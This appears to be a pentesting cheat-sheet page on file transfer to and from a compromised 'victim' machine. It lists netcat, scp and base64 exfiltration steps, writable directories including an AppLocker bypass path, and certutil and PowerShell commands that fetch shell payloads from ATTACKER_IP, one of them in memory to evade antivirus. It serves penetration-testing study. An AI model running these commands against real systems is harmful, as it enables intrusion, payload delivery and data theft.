File transfer
During a pentesting, you will find interesting files that you may want to download for later analysis, or even you may want to upload your tools for performing attacks. However, you will not always have the means to transfer files on a restricted computer. Hence, in this section, you will see several methods to transfer files depending on the victim's OS.
If you do not have write permissions to upload files on the victim's system, there are always some directories that allow everyone to write files on them:
/tmp/
/dev/shm/
# Listening for the file to be transfered
nc -nlvp 4444 > file
# Transfer the file
nc -w 3 <DST_IP> 4444 < file
# Download a file
scp [-r] <USER>@<IP>:<SRC_PATH> <DST_PATH>
# Upload a file
scp <SRC_PATH> <USER>@<IP>:<DST_PATH>
Compress the file for a smaller base64 output. Then, base64 the compressed file and copy the output on your clipboard.
zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt
Paste the output into a file and decode the file. Finally, uncompress the file.
base64 -d exfil.txt > exfil.zip
unzip exfil.zip
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\ # Allow bypass AppLocker
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
With certutil, you can download files into the victim's machine. Nonetheless, take into account that the downloaded file will be analyzed by installed AVs.
certutil.exe -split -urlcache -f http://<IP>/file.exe f.ex
With PowerShell, you can download files.
powershell.exe Invoke-WebRequest -Uri "http://<ATTACKER_IP>/shell.exe" -OutFile notashell.exe
For Powershell scripts, instead of downloading them on the disk you can store them on memory bypassing some AVs.
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/shell.ps1')"
With the use of impacket you can create your own SMB server to upload and download files from the victim's computer.
#Kali
smbserver.py -smb2support a .
#Victim
\\IP\a\nc.exe
copy \\IP\a\nc.exe .
Last modified 6mo ago